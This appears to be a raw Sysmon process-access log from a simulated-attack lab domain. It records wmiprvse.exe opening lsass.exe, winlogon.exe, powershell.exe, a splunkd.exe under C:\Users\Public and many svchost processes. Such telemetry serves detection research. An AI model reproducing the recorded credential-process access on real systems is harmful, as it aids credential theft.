15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 